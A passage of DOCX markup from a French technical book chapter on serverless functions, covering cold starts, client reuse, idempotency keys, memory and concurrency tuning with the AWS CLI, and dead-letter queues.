              <w:t>Quelques dizaines de Mo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3414"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Dépendances limitées</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="273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Concurrence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="286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Quota par compte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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File d'attente en cas de pic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2732"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Stockage temporaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2868"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>500 Mo à 10 Go</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3414"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Éphémère, non partagé</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DÉMARRAGE À FROID</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Création d'une nouvelle instance pour servir une requête. Il dépend de la taille du paquet, du runtime et des initialisations au chargement du module.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>73.2 Écrire une fonction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le gestionnaire reçoit un événement et un contexte. La logique doit être courte, idempotente, et sortir les initialisations coûteuses du gestionnaire pour les réutiliser entre invocations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une fonction avec client réutilisé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Initialisation hors gestionnaire : réutilisée entre invocations</w:t>
        <w:br/>
        <w:t>import { Client } from "pg";</w:t>
        <w:br/>
        <w:br/>
        <w:t>let client;</w:t>
        <w:br/>
        <w:br/>
        <w:t>async function obtenirClient() {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (!client) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    client = new Client({ connectionString: process.env.DATABASE_URL });</w:t>
        <w:br/>
        <w:t xml:space="preserve">    await client.connect();</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return client;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>export async function handler(event) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const { id } = JSON.parse(event.body ?? "{}");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (!id) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return { statusCode: 400, body: JSON.stringify({ erreur: "id requis" }) };</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  const db = await obtenirClient();</w:t>
        <w:br/>
        <w:t>const resultat = await db.query("SELECT * FROM commandes WHERE id = $1",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    [id]);</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  if (!resultat.rowCount) {</w:t>
        <w:br/>
        <w:t>return { statusCode: 404, body: JSON.stringify({ erreur: "introuvable" }) };</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return { statusCode: 200, body: JSON.stringify(resultat.rows[0]) };</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.272 — Cinq bonnes pratiques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3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Bonne pratique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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Raison</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3314"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Initialiser hors gestionnaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2916"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Réutilisation de l'instance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2784"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Latence réduite</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="331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Fermer les connexions proprement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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Épuisement du pool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Stabilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3314"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Limiter les dépendances</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2916"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Taille du paquet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2784"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Démarrage à froid réduit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="331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Journaliser en JSON</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Recherche facilitée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3314"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Rendre idempotent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2916"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Réessais automatiques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2784"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Pas de doublon</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une clé d'idempotence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Une fonction idempotente : la même requête peut être rejouée</w:t>
        <w:br/>
        <w:t>async function traiterPaiement(evenement) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const deja = await db.query(</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "SELECT 1 FROM paiements WHERE idempotency_key = $1",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    [evenement.cle]</w:t>
        <w:br/>
        <w:t xml:space="preserve">  );</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (deja.rowCount) return { statut: "deja_traite" };</w:t>
        <w:br/>
        <w:br/>
        <w:t>await db.query("INSERT INTO paiements (idempotency_key, montant) VALUES ($1,</w:t>
        <w:br/>
        <w:t xml:space="preserve">    $2)",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    [evenement.cle, evenement.montant]);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return { statut: "traite" };</w:t>
        <w:br/>
        <w:t>}</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LES RÉESSAIS SONT AUTOMATIQUES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Une fonction peut être exécutée plusieurs fois pour un même événement en cas d'erreur ou de délai dépassé. Sans clé d'idempotence, chaque réessai crée un doublon : double débit, double courriel, double commande.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>73.3 Mémoire, délai et concurrence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La mémoire allouée détermine le processeur disponible et le coût. Un réglage par défaut est rarement optimal : la mesure donne le bon compromis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une mesure comparative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Mesurer le temps d'exécution par niveau de mémoire</w:t>
        <w:br/>
        <w:t>for mem in 256 512 1024 2048; do</w:t>
        <w:br/>
        <w:t xml:space="preserve">  aws lambda update-function-configuration \</w:t>
        <w:br/>
        <w:t xml:space="preserve">    --function-name api --memory-size $mem &gt;/dev/null</w:t>
        <w:br/>
        <w:t xml:space="preserve">  sleep 5</w:t>
        <w:br/>
        <w:t xml:space="preserve">  aws lambda invoke --function-name api --payload '{"body":"{\"id\":1}"}' \</w:t>
        <w:br/>
        <w:t xml:space="preserve">    /tmp/sortie.json &gt;/dev/null</w:t>
        <w:br/>
        <w:t xml:space="preserve">  echo "$mem Mo : $(grep -o '"duration":[0-9.]*' /tmp/sortie.json)"</w:t>
        <w:br/>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.273 — Quatre situations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3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Situation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Réglage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="265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Raison</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3314"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Fonction liée au CPU</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Plus de mémoire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2651"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Le CPU augmente avec la mémoire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="331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Fonction d'attente réseau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Mémoire modérée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Le CPU n'est pas le facteur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3314"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Démarrage à froid critique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Mémoire élevée, paquet réduit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2651"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Moins de latence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="331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Coût minimal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Mesurer, pas deviner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Le moins cher n'est pas le plus petit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux protections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Limiter la concurrence pour protéger une base</w:t>
        <w:br/>
        <w:t>aws lambda put-function-concurrency \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --function-name api --reserved-concurrent-executions 20</w:t>
        <w:br/>
        <w:br/>
        <w:t># File d'attente en cas de dépassement (asynchrone)</w:t>
        <w:br/>
        <w:t># Configurer une file de lettres mortes pour les échecs</w:t>
        <w:br/>
        <w:t>aws lambda update-function-configuration \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --function-name api \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --dead-letter-config TargetArn=arn:aws:sqs:eu-west-3:123456789012:api-dlq</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FILE DE LETTRES MORTES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>File qui reçoit les événements qu'une fonction n'a pas pu traiter. Elle évite la perte silencieuse et permet le rejeu après correction.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>73.4 Concevoir une chaîne d'événements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un enchaînement de fonctions doit tolérer les échecs partiels. La configuration la plus robuste combine file d'attente, idempotence et lettre morte.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
